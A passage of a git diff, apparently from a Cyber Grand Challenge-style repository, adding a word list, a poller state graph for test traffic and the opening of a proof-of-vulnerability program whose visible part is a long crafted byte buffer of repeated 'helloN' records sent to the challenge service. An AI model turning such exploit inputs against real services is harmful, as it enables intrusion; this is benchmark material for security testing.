"hot-tempered", + "inauguration", + "cannibalism", + "ambition", + "district", + "manger", + "decorate", + "ethical", + "eavesdropper", + "badger", + "freethinker", + "certifiable", + "collapsible", + "animated", + "electrocution", + "embarrassingly", + "Greek", + "jellyfish", + "equestrian", + "discourse", + "instantaneous", + "depravity", + "bait", + "inexplicable", + "boiling point", + "diagonal", + "glitzy", + "hard-working", + "adrenaline", + "befallen", + "herbivore", + "cold", + "inception", + "major-league", + "crutch", + "indices", + "conduct", + "industrialization", + "doz.", + "carousel", + "expect", + "cutting", + "capitalist", + "bandage", + "hopefully", + "investment", + "geology", + "coop", + "befell", + "forked", + "grease", + "annexation", + "kindergarten", + "boomerang", + "belatedly", + "hypertension", + "encompass", + "caught", + "goddamned", + "conference", + "heading", + "ecstasy", + "listener", + "dairy", + "degradation", + "experienced", + "barometric", + "glass ceiling", + "evenness", + "current", + "jinx", + "celebrated", + "immigrate", + "cut", + "autograph", + "diversion", + "kayak", + "feces", + "icon", + "eel", + "maim", + "bowl", + "fearlessly", + "assumption", + "awful", + "habitable", + "bearded", + "double-talk", + "insoluble", + "celery", + "criticize", + "enlighten", + "autobiographical", + "due process", + "cold-blooded", + "boyhood", + "extort", + "expropriate", + "humorist", + "benign", + "fender-bender", + "extol", + "chamber", + "euphemism", + "investor", + "cultivated", + "infest", + "fl. oz.", + "desolation", + "illustrate", + "life-threatening", + "audit", + "bloodshot", + "cynical", + "activist", + "Fri.", + "cheaply", + "gritty", + "deformity", + "Confederate", + "bimonthly", + "bundle", + "fire engine", + "aerosol", + "chauvinist", + "encyclopedia", + "devil", + "crisis", + "fondly", + "infrared", + "elongated", + "insubordinate", + "doghouse", + "hideously", + "blacken", + "child", + "appreciatively", + "imperfection", + "cross", + "butte", + "contemptible", + "imprisonment", + "from", + "fear", + "hamburger", + "DC", + "deprived", + "gosling", + "companionable", + "immobility", + "lust", + "clapper", + "eh", + "induct", + "limit", + "blabbermouth", + "boulder", + "categorize", + "expensive", + "CIA", + "ballistics", + "chairman", + "buoyantly", + "distracted", + "debut", + "epileptic", + "disuse", + "commotion", + "abusive", + "dispensable", + "lozenge", + "campaign", + "drizzle", + "footbridge", + "confident", + "clothesline", + "lettuce", + "empathize", + "kidney bean", + "cesarean section", + "conjure", + "elitist", + "drape", + "eligible", + "hag", + "bidding", + "funky", + "evangelist", + "hazel", + "birdseed", + "crackle", + "glad", + "lounge", + "experience", + "counterfeiter", + "dopey", + "attache case", + "impediment", + "halo", + "hacksaw", + "extremist", + "foul ball", + "flaccid", + "ammonia", + "hexagon", + "documentary", + "guarantor", + "interpersonal", + "gore", + "defiance", + "balloon", + "herd", + "fatalism", + "dash", + "exporter", + "light-headed", + "dust", + "alkaline", + "base", + "cautiously", + "conscience", + "ferociously", + "hackneyed", + "itemize", + "bran", + "consider", + "candle", + "chimpanzee", + "fruity", + "frustrating", + "flow", + "aggravation", + "hydraulics", + "abstinence", + "folk music", + "gossip", + "great", + "dandy", + "feminist", + "flophouse", + "dubious", + "disapproving", + "fire department", + "gotta", + "did", + "legal-size", + "cassette", + "crowbar", + "don't", + "heard", + "access", + "giddy", + "decent", + "amateur", + "chuckle", + "keg", + "condiment", + "low-key", + "figuratively", + "blubber", + "homeopathy", + "candidly", + "chintz", + "aural", + "given", + "male chauvinist", + "homeward", + "executive", + "locker", + "bookmaker", + "force-feed", + "beater", + "bottleneck", + "exhume", + "hang gliding", + "auditorium", + "framework", + "lynch", + "childlike", +] diff --git a/exclude/FUN/poller/for-testing/state-graph.yaml b/exclude/FUN/poller/for-testing/state-graph.yaml new file mode 100644 index 000000000..b0a0da042 --- /dev/null +++ b/exclude/FUN/poller/for-testing/state-graph.yaml @@ -0,0 +1,44 @@ +--- +nodes: +- name: start +- name: menu1 +- name: do_reprotect1 +- name: do_add_word1 +- name: do_search1 +- name: do_generate1 +- name: do_training1 +- name: do_sort +- name: menu2 +- name: do_reprotect2 +- name: do_add_word2 +- name: do_search2 +- name: do_generate2 +- name: do_training2 +- name: end + +edges: +- start: menu1 +- menu1: do_reprotect1 +- menu1: do_add_word1 +- menu1: do_search1 +- menu1: do_generate1 +- menu1: do_training1 +- menu1: do_sort +- do_reprotect1: menu1 +- do_add_word1: menu1 +- do_search1: menu1 +- do_generate1: menu1 +- do_training1: menu1 +- do_sort: menu2 +- menu2: do_reprotect2 +- menu2: do_add_word2 +- menu2: do_search2 +- menu2: do_generate2 +- menu2: do_training2 +- menu2: end + weight: 0.05 +- do_reprotect2: menu2 +- do_add_word2: menu2 +- do_search2: menu2 +- do_generate2: menu2 +- do_training2: menu2 diff --git a/exclude/FUN/pov_1/pov.c b/exclude/FUN/pov_1/pov.c new file mode 100644 index 000000000..cd36ba128 --- /dev/null +++ b/exclude/FUN/pov_1/pov.c @@ -0,0 +1,2259 @@ +#include "libpov.h" +int main(int cgc_argc, char *cgc_argv[]) { + cgc_negotiate_type1(0x0, 0x0, 0); + do { + //*** writing data + static unsigned char write_00000_00000[] = + "\x0a\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f\x30\xff\x43\x26" + "\x46\x38\x06\x68\x65\x6c\x6c\x6f\x31\xff\x43\x26\x46\x38\x06\x68" + "\x65\x6c\x6c\x6f\x32\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f" + "\x33\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f\x34\xff\x43\x26" + "\x46\x38\x06\x68\x65\x6c\x6c\x6f\x35\xff\x43\x26\x46\x38\x06\x68" + "\x65\x6c\x6c\x6f\x36\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f" + "\x37\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f\x38\xff\x43\x26" + "\x46\x38\x06\x68\x65\x6c\x6c\x6f\x39\xff\x43\x26\x46\x38\x07\x68" + "\x65\x6c\x6c\x6f\x31\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" + "\x6f\x31\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x32" + "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x33\xff\x43\x26" + "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x34\xff\x43\x26\x46\x38\x07" + "\x68\x65\x6c\x6c\x6f\x31\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c" + "\x6c\x6f\x31\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31" + "\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x38\xff\x43" + "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x39\xff\x43\x26\x46\x38" + "\x07\x68\x65\x6c\x6c\x6f\x32\x30\xff\x43\x26\x46\x38\x07\x68\x65" + "\x6c\x6c\x6f\x32\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" + "\x32\x32\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x33\xff" + "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x34\xff\x43\x26\x46" + "\x38\x07\x68\x65\x6c\x6c\x6f\x32\x35\xff\x43\x26\x46\x38\x07\x68" + "\x65\x6c\x6c\x6f\x32\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" + "\x6f\x32\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x38" + "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x39\xff\x43\x26" + "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x30\xff\x43\x26\x46\x38\x07" + "\x68\x65\x6c\x6c\x6f\x33\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c" + "\x6c\x6f\x33\x32\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33" + "\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x34\xff\x43" + "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x35\xff\x43\x26\x46\x38" + "\x07\x68\x65\x6c\x6c\x6f\x33\x36\xff\x43\x26\x46\x38\x07\x68\x65" + "\x6c\x6c\x6f\x33\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" + "\x33\x38\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x39\xff" + "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x30\xff\x43\x26\x46" + "\x38\x07\x68\x65\x6c\x6c\x6f\x34\x31\xff\x43\x26\x46\x38\x07\x68" + "\x65\x6c\x6c\x6f\x34\x32\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" + "\x6f\x34\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x34" + "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x35\xff\x43\x26" + "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x36\xff\x43\x26\x46\x38\x07" + "\x68\x65\x6c\x6c\x6f\x34\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c" + "\x6c\x6f\x34\x38\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34" + "\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x30\xff\x43" + "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x31\xff\x43\x26\x46\x38" + "\x07\x68\x65\x6c\x6c\x6f\x35\x32\xff\x43\x26\x46\x38\x07\x68\x65" + "\x6c\x6c\x6f\x35\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" + "\x35\x34\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x35\xff" + "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x36\xff\x43\x26\x46" + "\x38\x07\x68\x65\x6c\x6c\x6f\x35\x37\xff\x43\x26\x46\x38\x07\x68" + "\x65\x6c\x6c\x6f\x35\x38\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" + "\x6f\x35\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x30" + "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x31\xff\x43\x26" + "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x32\xff\x43\x26\x46\x38\x07" + "\x68\x65\x6c\x6c\x6f\x36\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c" + "\x6c\x6f\x36\x34\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36" + "\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x36\xff\x43" + "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x37\xff\x43\x26\x46\x38" + "\x07\x68\x65\x6c\x6c\x6f\x36\x38\xff\x43\x26\x46\x38\x07\x68\x65" + "\x6c\x6c\x6f\x36\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" + "\x37\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x31\xff" + "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x32\xff\x43\x26\x46" + "\x38\x07\x68\x65\x6c\x6c\x6f\x37\x33\xff\x43\x26\x46\x38\x07\x68" + "\x65\x6c\x6c\x6f\x37\x34\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" + "\x6f\x37\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x36" + "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x37\xff\x43\x26" + "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x38\xff\x43\x26\x46\x38\x07" + "\x68\x65\x6c\x6c\x6f\x37\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c" + "\x6c\x6f\x38\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38" + "\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x32\xff\x43" + "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x33\xff\x43\x26\x46\x38" + "\x07\x68\x65\x6c\x6c\x6f\x38\x34\xff\x43\x26\x46\x38\x07\x68\x65" + "\x6c\x6c\x6f\x38\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" + "\x38\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x37\xff" + "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x38\xff\x43\x26\x46" + "\x38\x07\x68\x65\x6c\x6c\x6f\x38\x39\xff\x43\x26\x46\x38\x07\x68" + "\x65\x6c\x6c\x6f\x39\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" + "\x6f\x39\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x32" + "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x33\xff\x43\x26" + "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x34\xff\x43\x26\x46\x38\x07" + "\x68\x65\x6c\x6c\x6f\x39\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c" + "\x6c\x6f\x39\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39" + "\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x38\xff\x43" + "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x39\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x30\x30\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x30\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x30\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x30\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30" + "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30\x35\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30\x36\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30\x37\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x30\x38\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x30\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x31\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x31\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31" + "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31\x33\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31\x34\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31\x35\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x31\x36\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x31\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x31\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x31\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32" + "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x31\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x32\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x33\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x32\x34\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x32\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x32\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x32\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32" + "\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x39\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x30\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x31\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x33\x32\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x33\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x33\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x33\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33" + "\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x37\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x38\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x39\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x34\x30\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x34\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x34\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x34\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34" + "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34\x35\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34\x36\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34\x37\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x34\x38\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x34\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x35\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x35\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35" + "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35\x33\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35\x34\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35\x35\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x35\x36\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x35\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x35\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x35\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36" + "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x31\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x32\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x33\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x36\x34\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x36\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x36\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x36\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36" + "\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x39\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x30\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x31\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x37\x32\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x37\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x37\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x37\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37" + "\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x37\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x38\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x39\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x38\x30\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x38\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x38\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x38\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38" + "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38\x35\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38\x36\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38\x37\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x38\x38\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x38\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x39\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x39\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39" + "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39\x33\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39\x34\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39\x35\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x31\x39\x36\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x31\x39\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x31\x39\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x31\x39\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30" + "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30\x31\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30\x32\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30\x33\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x30\x34\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x30\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x30\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x30\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30" + "\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30\x39\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x31\x30\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x31\x31\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x31\x32\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x31\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x31\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x31\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x31" + "\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x31\x37\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x31\x38\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x31\x39\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x32\x30\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x32\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x32\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x32\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x32" + "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x32\x35\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x32\x36\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x32\x37\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x32\x38\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x32\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x33\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x33\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x33" + "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x33\x33\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x33\x34\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x33\x35\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x33\x36\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x33\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x33\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x33\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x34" + "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x34\x31\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x34\x32\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x34\x33\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x34\x34\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x34\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x34\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x34\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x34" + "\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x34\x39\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x35\x30\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x35\x31\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x35\x32\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x35\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x35\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x35\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x35" + "\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x35\x37\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x35\x38\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x35\x39\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x36\x30\xff\x43\x26\x46\x38\x08\x68" + "\x65\x6c\x6c\x6f\x32\x36\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" + "\x6c\x6f\x32\x36\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" + "\x32\x36\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x36" + "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x36\x35\xff" + "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x36\x36\xff\x43\x26" + "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x36\x37\xff\x43\x26\x46\x38" + "\x08\x68\x65\x6c\x6c\x6f\x32\x36\x38\xff\x43\x26\x46\x38\x08\x68" + 